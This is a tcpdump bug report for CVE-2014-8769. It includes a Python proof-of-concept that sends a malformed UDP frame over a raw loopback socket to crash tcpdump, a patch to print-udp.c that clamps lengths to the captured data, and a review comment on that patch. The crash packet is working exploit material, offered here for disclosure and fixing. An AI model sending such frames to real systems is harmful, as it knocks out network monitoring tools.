Package: tcpdump
Version: 4.6.2
tags: Security
Using the following script to generate the packet:
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW

# Raw link-layer socket bound to loopback (requires root)
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
# Ethernet frame carrying an IPv4/UDP packet whose IP total length (0xe63d)
# far exceeds the bytes actually present; sent as-is from the report
aovd_frame = b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
s.send(aovd_frame)
# capture with: sudo tcpdump -i lo -s 0 -n -v
This causes a segfault in tcpdump. This bug is reported as CVE-2014-8769.
The proposed patch is in the attached file. The main idea is to check the length of
the available (captured) data before printing it.
The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
Original report on bugtraq:
http://seclists.org/bugtraq/2014/Nov/88
CongNT
--- tcpdump-tcpdump-4.6/print-udp.c 2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c 2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
#ifdef INET6
register const struct ip6_hdr *ip6;
#endif
+ u_int caplength;
+
+ /* Checking length of available data before print */
+ caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+ if (length > caplength)
+ length = caplength;
if (ep > ndo->ndo_snapend)
ep = ndo->ndo_snapend;
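Review bot: the clamp `if (length > caplength) length = caplength;` at the top of the function rewrites `length` for every later consumer, not only the print path the comment ("Checking length of available data before print") names, so a capture truncated by the snaplen becomes indistinguishable from a genuinely short datagram for any later length-based check. Either keep the original `length` in a separate variable and apply `caplength` only where bytes are dereferenced for output, or reword the comment to say that the whole function now operates on the captured length and flag truncation to the user as the rest of the decoder does. Also note that `ndo->ndo_snapend - bp` is a `ptrdiff_t` assigned to `u_int caplength`; the preceding `ndo->ndo_snapend >= bp` guard keeps it non-negative, which is worth stating in the comment since the correctness of the narrowing depends on it.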